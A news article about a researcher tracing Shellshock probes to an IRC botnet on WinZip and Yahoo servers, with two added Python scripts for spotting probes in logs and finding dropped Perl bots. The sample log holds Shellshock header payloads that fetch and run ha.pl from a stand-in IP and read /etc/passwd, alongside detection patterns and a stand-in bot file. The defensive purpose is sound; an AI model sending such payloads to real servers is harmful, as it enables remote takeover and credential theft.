White hat claims Yahoo and WinZip hacked by “shellshock” exploiters
A security researcher claims to have uncovered a botnet being built by Romanian hackers using the “Shellshock” exploit against servers on a number of high-profile domains, including servers at Yahoo and the utility software developer WinZip. Jonathan Hall, president and senior engineer of the technology consulting firm Future South Technologies, published a lengthy explanation of the exploits and his communications with the exploited on his company’s website this weekend and said that Yahoo had acknowledged finding traces of the botnet on two of its servers.
Hall found the botnet, he said, by tracking down the source of requests that probed one of his servers for vulnerable CGI scripts that could be exploited using the Shellshock bash vulnerability. The flaw lies in how bash imports function definitions from environment variables: an unpatched bash also executes whatever commands follow the function body. Because a Web server running CGI copies request headers such as User-Agent and Referer into environment variables before it runs a script, an attacker can place a crafted header in a request to any CGI script that invokes bash and have the server execute arbitrary commands, potentially giving the attacker remote control of the server. Hall traced the probes back to a server at WinZip.com. He then used his own exploit of the bash bug to list the processes running on the WinZip server and identified a Perl script running there named ha.pl.
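Probes like the ones Hall traced leave a distinctive mark in Web server logs: a bash function definition (`() { ...};`) followed by a command, sitting in a header field. The following script is an added example, not code from the article or from Hall, that pulls such requests out of constructed Apache combined-format log lines, extracts the injected command and the source address to follow back, and runs the classic local self-test against the installed bash. The log lines, IP addresses and the ha.pl download URL in them are constructed for the demonstration.

```python
import os
import re
import shutil
import subprocess
from collections import Counter
from typing import Dict, List, Optional

# Constructed Apache combined-format access log lines (not real traffic).
# Lines one and three carry a Shellshock payload in the User-Agent and Referer headers,
# which a CGI-enabled server copies into HTTP_USER_AGENT / HTTP_REFERER before running the script.
SAMPLE_LOG = """\
203.0.113.7 - - [06/Oct/2014:01:12:05 +0000] "GET /cgi-bin/status.cgi HTTP/1.1" 200 512 "-" "() { :;}; /bin/bash -c 'wget http://198.51.100.9/ha.pl -O /tmp/ha.pl; perl /tmp/ha.pl'"
198.51.100.22 - - [06/Oct/2014:01:12:09 +0000] "GET /index.html HTTP/1.1" 200 1042 "http://example.com/" "Mozilla/5.0"
203.0.113.7 - - [06/Oct/2014:01:13:41 +0000] "GET /cgi-bin/test-cgi HTTP/1.1" 404 210 "() { ignored;};echo;/bin/cat /etc/passwd" "curl/7.37.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# A bash function definition exported through the environment ("() { ... }") followed by
# trailing text; an unpatched bash executes that trailing text when it imports the variable.
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{[^}]*\}\s*;\s*(?P<cmd>.*)$')


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Split one combined-format log line into its fields, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_shellshock_probes(log_text: str) -> List[Dict[str, str]]:
    """Return one record per request whose Referer or User-Agent carries a Shellshock payload."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        req_parts = rec["req"].split()
        path = req_parts[1] if len(req_parts) > 1 else rec["req"]
        for field in ("referer", "ua"):
            m = SHELLSHOCK_RE.search(rec[field])
            if m:
                hits.append({"ip": rec["ip"], "ts": rec["ts"], "path": path,
                             "field": field, "cmd": m.group("cmd").strip()})
    return hits


def probe_sources(hits: List[Dict[str, str]]) -> Dict[str, int]:
    """Count probes per source address; the address is the lead to follow back, as Hall did."""
    return dict(Counter(h["ip"] for h in hits))


def bash_is_vulnerable() -> Optional[bool]:
    """Classic CVE-2014-6271 self-test: export a function-shaped variable with a trailing
    command and see whether bash runs it. Returns None when no bash binary is available."""
    bash = shutil.which("bash")
    if bash is None:
        return None
    env = {"PATH": os.environ.get("PATH", "/usr/bin:/bin"),
           "x": "() { :;}; echo VULNERABLE"}
    out = subprocess.run([bash, "-c", "echo probe"], env=env,
                         capture_output=True, text=True).stdout
    return "VULNERABLE" in out


if __name__ == "__main__":
    probes = find_shellshock_probes(SAMPLE_LOG)
    for p in probes:
        print(f"{p['ts']} {p['ip']} {p['path']} via {p['field']}: {p['cmd']}")
    print("probes per source:", probe_sources(probes))
    print("local bash vulnerable:", bash_is_vulnerable())
```

Only the Referer and User-Agent fields are checked because those are what the combined log format records; a server that logs other headers (or the query string, which some CGI wrappers also pass through the environment) should be searched the same way. The self-test only proves the interpreter is fixed; it says nothing about scripts already dropped on the host.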
After extracting the contents of the script, Hall discovered that it was an Internet Relay Chat (IRC) bot similar to the IRC-controlled bots commonly used to perform distributed denial of service attacks. However, as he examined it more closely, he found that it “appeared to focus more on shell interaction than DDoS capabilities,” he wrote. According to Hall, it gives its operators remote control of the server while using its IRC code to report back to an IRC channel (called, creatively, #bash). The code was also heavily commented in Romanian.
Hall said that he then remotely killed the process and notified both WinZip and the FBI by e-mail of the presence of the hack. His decision to kill it was made “considering this was one of their ‘store’ boxes, which serves as a payment gateway for WinZip purchases. Not good…”
Hall then used the connection details from the Perl script to join the IRC channel it reported to and watch its traffic. He said he saw bots checking in from a number of “pretty high profile” domains, including lycos.com and yahoo.com. The channel appeared to be used for command and control of the bots: to collect information from them, including their operating system version, system details and the contents of their hosts file, and to install additional scripts on them. One of the Yahoo servers he saw exploited was an application server for Yahoo Sports, but he noted that the attackers seemed focused on gaining access to Yahoo’s Games servers.
After sending e-mails and messages via Twitter to a number of people at Yahoo—including a message directed to Yahoo CEO Marissa Mayer that was CC’d to the New Orleans office of the FBI—Hall said that he received a response from Yahoo security, thanking him for the information. “We’ve found the tracks mentioned in your e-mail and are working through our IR [incident response] process,” a Yahoo security staffer wrote in an e-mail posted by Hall on his site.
Hall found the exploits on WinZip and Yahoo after he had conducted his own scan for potentially vulnerable sites using his own Shellshock exploit code. He also used Google searches to find other vulnerable sites and discovered that many of them had already been exploited by IRC bots similar to the ones discovered on WinZip’s and Yahoo’s servers:
Almost every single vulnerable site I found via Google searches had a .pl either in the cgi-bin directory or in /tmp, and /var/tmp, that connected back to an IRC server…I analyzed [the code] and realized that some of them have their own spreading capabilities—using the same methodology of searching Google, but getting very, very specific in their searches. The spreader code actually drilled down to searching specific TLDs—i.e. .com, .nz, .co.uk, .jp, etc…—using the site: search modifier. This was an interesting find, because it shows a level of ingenuity behind the spreader. The one thing in common amidst almost all of the different perl scripts I found—they all used the SAME spreader code.
That would seem to indicate that Shellshock exploits in the wild are already using Google Search and other tools to spread worm-style, installing backdoors on vulnerable systems as they are discovered and adding them to the network that hunts for more. Patching bash closes the entry point but does not remove the bots: a system compromised before it was patched may still be running the dropped Perl script, which reconnects to the command-and-control channel on its own and no longer needs the bash flaw. Checking for such scripts in cgi-bin, /tmp and /var/tmp, and for perl processes running out of those directories, is a separate step from applying the patch.
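A host check for the leftover bots the article describes, as an added example that is not code from the article or from Hall: it walks the directories where the Perl scripts were found, flags .pl files that open an IRC socket and speak the protocol (with the Google-dork spreader and shell execution as secondary indicators), and parses `ps` output for perl interpreters running scripts out of temp directories. The candidate directory list, the `ps` sample and the two scripts it writes into a throwaway directory are constructed for the demonstration; the stand-in named ha.pl carries only the traits the scan keys on and is not the real bot.

```python
import re
import tempfile
from pathlib import Path
from typing import Dict, List

# Where the article reports the bots living: dropped into /tmp or /var/tmp, or sitting in cgi-bin.
# Hypothetical defaults; adjust the CGI directory to the server's actual layout.
CANDIDATE_DIRS = ["/tmp", "/var/tmp", "/dev/shm", "/usr/lib/cgi-bin", "/var/www/cgi-bin"]

# Traits of a Perl IRC bot: a TCP socket to an IRC port, IRC protocol verbs, a channel join,
# a Google-based spreader, and shell execution. None alone is proof; the combination is.
IRC_INDICATORS = {
    "irc_socket": re.compile(r"IO::Socket::INET|PeerPort\s*=>\s*66[67]\d"),
    "irc_protocol": re.compile(r"\b(NICK|USER|JOIN|PRIVMSG)\b"),
    "irc_channel": re.compile(r"JOIN\s+#\w+"),
    "google_spreader": re.compile(r"google\.[a-z.]+/search|\bsite:", re.I),
    "shell_exec": re.compile(r"\bsystem\s*\(|`[^`]+`|\bexec\s*\("),
}

# Constructed sample `ps -eo pid,user,args` output for the process check (not a real capture).
PS_SAMPLE = """\
  PID USER     COMMAND
  812 www-data perl /tmp/ha.pl
  903 www-data /usr/sbin/apache2 -k start
 1204 root     perl /usr/local/bin/backup.pl --nightly
"""


def score_perl_file(text: str) -> Dict[str, bool]:
    """Which indicators fire in a script's source."""
    return {name: bool(rx.search(text)) for name, rx in IRC_INDICATORS.items()}


def looks_like_irc_bot(text: str) -> bool:
    """Flag a script only when it both opens an IRC socket and speaks the protocol."""
    hits = score_perl_file(text)
    return hits["irc_socket"] and hits["irc_protocol"]


def scan_dirs(dirs: List[str]) -> List[Dict[str, object]]:
    """Walk the candidate directories for .pl files that look like IRC bots."""
    findings = []
    for d in dirs:
        root = Path(d)
        if not root.is_dir():
            continue
        for p in sorted(root.rglob("*.pl")):
            try:
                text = p.read_text(errors="replace")
            except OSError:
                continue
            if looks_like_irc_bot(text):
                findings.append({"path": str(p),
                                 "indicators": [k for k, v in score_perl_file(text).items() if v]})
    return findings


def suspicious_perl_processes(ps_text: str) -> List[Dict[str, str]]:
    """Running perl interpreters whose script lives in a world-writable temp directory."""
    out = []
    for line in ps_text.splitlines()[1:]:          # skip the header row
        parts = line.split(None, 2)
        if len(parts) < 3:
            continue
        pid, user, args = parts
        m = re.search(r"\bperl\b.*?(\S+\.pl)", args)
        if m and m.group(1).startswith(("/tmp/", "/var/tmp/", "/dev/shm/")):
            out.append({"pid": pid, "user": user, "script": m.group(1)})
    return out


def build_demo_tree() -> str:
    """Create a throwaway directory with one harmless script and one constructed stand-in
    carrying the bot indicators (not the real ha.pl; the scan only reads it, never runs it)."""
    root = tempfile.mkdtemp(prefix="shellshock-triage-")
    Path(root, "cgi-bin").mkdir()
    Path(root, "tmp").mkdir()
    Path(root, "cgi-bin", "rotate.pl").write_text(
        '#!/usr/bin/perl\n# constructed: harmless maintenance script\nuse strict;\nprint "rotating logs\\n";\n')
    Path(root, "tmp", "ha.pl").write_text(
        '#!/usr/bin/perl\n# constructed stand-in carrying only the traits the scan keys on\n'
        'use IO::Socket::INET;\n'
        'my $irc = IO::Socket::INET->new(PeerAddr => "irc.example.invalid", PeerPort => 6667);\n'
        'print $irc "NICK bot\\r\\nUSER bot 0 0 :bot\\r\\nJOIN #bash\\r\\n";\n'
        'my $info = `uname -a`;\n'
        'my $dork = "https://www.google.com/search?q=site:.co.uk+inurl:cgi-bin";\n')
    return root


if __name__ == "__main__":
    demo = build_demo_tree()
    for f in scan_dirs([demo] + CANDIDATE_DIRS):
        print(f"{f['path']}: {', '.join(f['indicators'])}")
    for p in suspicious_perl_processes(PS_SAMPLE):
        print(f"pid {p['pid']} ({p['user']}) runs {p['script']}")
```

The file scan is deliberately conservative: an IRC socket plus protocol verbs is required before a script is reported, so a legitimate IRC client library would also be flagged, while a bot that obfuscates its strings would not be. Treat a hit as a lead for manual review, and pair the file check with the process check, since a bot whose script has already been deleted from disk keeps running until the process is killed.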
We’ve attempted to reach out to Yahoo and WinZip for comment on the reported server breaches but have not gotten a response. We’ll update this report when more information is made available.